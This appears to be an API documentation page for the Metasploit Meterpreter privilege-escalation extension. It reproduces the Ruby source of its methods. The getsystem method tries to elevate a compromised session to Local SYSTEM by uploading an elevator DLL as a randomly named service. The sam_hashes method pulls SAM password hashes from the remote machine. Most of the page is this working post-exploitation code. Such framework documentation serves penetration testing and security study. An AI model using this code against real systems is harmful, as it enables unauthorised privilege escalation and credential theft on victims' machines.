Class: Rex::Post::Meterpreter::Extensions::Priv::Priv

Inherits:
Rex::Post::Meterpreter::Extension show all
Defined in:
lib/rex/post/meterpreter/extensions/priv/priv.rb

Overview

This meterpreter extensions a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.

Instance Attribute Summary collapse

Attributes inherited from Rex::Post::Meterpreter::Extension

#client, #name

Class Method Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(client) ⇒ Priv

Initializes the privilege escalationextension.


30
31
32
33
34
35
36
37
38
39
40
41
42
43
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 30

def initialize(client)
  super(client, 'priv')

  client.register_extension_aliases(
    [
      {
        'name' => 'priv',
        'ext'  => self
      },
    ])

  # Initialize sub-classes
  self.fs = Fs.new(client)
end

Instance Attribute Details

#fsObject

Modifying privileged file system attributes.


123
124
125
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 123

def fs
  @fs
end

Class Method Details

.extension_idObject


23
24
25
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 23

def self.extension_id
  EXTENSION_ID_PRIV
end

Instance Method Details

#getsystem(technique = 0) ⇒ Object

Attempt to elevate the meterpreter to Local SYSTEM


48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 48

def getsystem(technique=0)
  request = Packet.create_request(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM)

  # We only need the elevate DLL for when we're invoking the tokendup
  # method, which we'll only use if required (ie. trying all or when
  # that metdho is asked for explicitly)
  if [0, 3].include?(technique)
    elevator_name = Rex::Text.rand_text_alpha_lower(6)

    elevator_path = nil
    client.binary_suffix.each { |s|
      elevator_path = MetasploitPayloads.meterpreter_path('elevator', s)
      if !elevator_path.nil?
        break
      end
    }
    if elevator_path.nil?
      elevators = ''
      client.binary_suffix.each { |s|
        elevators << "elevator.#{s}, "
      }
      raise RuntimeError, "#{elevators.chomp(', ')} not found", caller
    end

    elevator_data = ''

    ::File.open(elevator_path, 'rb') { |f|
      elevator_data += f.read(f.stat.size)
    }

    request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name)
    request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data)
    request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length)
  end

  request.add_tlv(TLV_TYPE_ELEVATE_TECHNIQUE, technique)

  # as some service routines can be slow we bump up the timeout to 90 seconds
  response = client.send_request(request, 90)

  technique = response.get_tlv_value(TLV_TYPE_ELEVATE_TECHNIQUE)

  if(response.result == 0 and technique != nil)
    client.core.use('stdapi') if not client.ext.aliases.include?('stdapi')
    client.update_session_info
    client.sys.config.getprivs
    if client.framework.db and client.framework.db.active
      client.framework.db.report_note(
        :host => client.sock.peerhost,
        :workspace => client.framework.db.workspace,
        :type => 'meterpreter.getsystem',
        :data => {:technique => technique}
      ) rescue nil
    end
    return [ true, technique ]
  end

  return [ false, 0 ]
end

#sam_hashesObject

Returns an array of SAM hashes from the remote machine.


111
112
113
114
115
116
117
118
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 111

def sam_hashes
  # This can take a long long time for large domain controls, bump the timeout to one hour
  response = client.send_request(Packet.create_request(COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES), 3600)

  response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
    SamUser.new(hash)
  }
end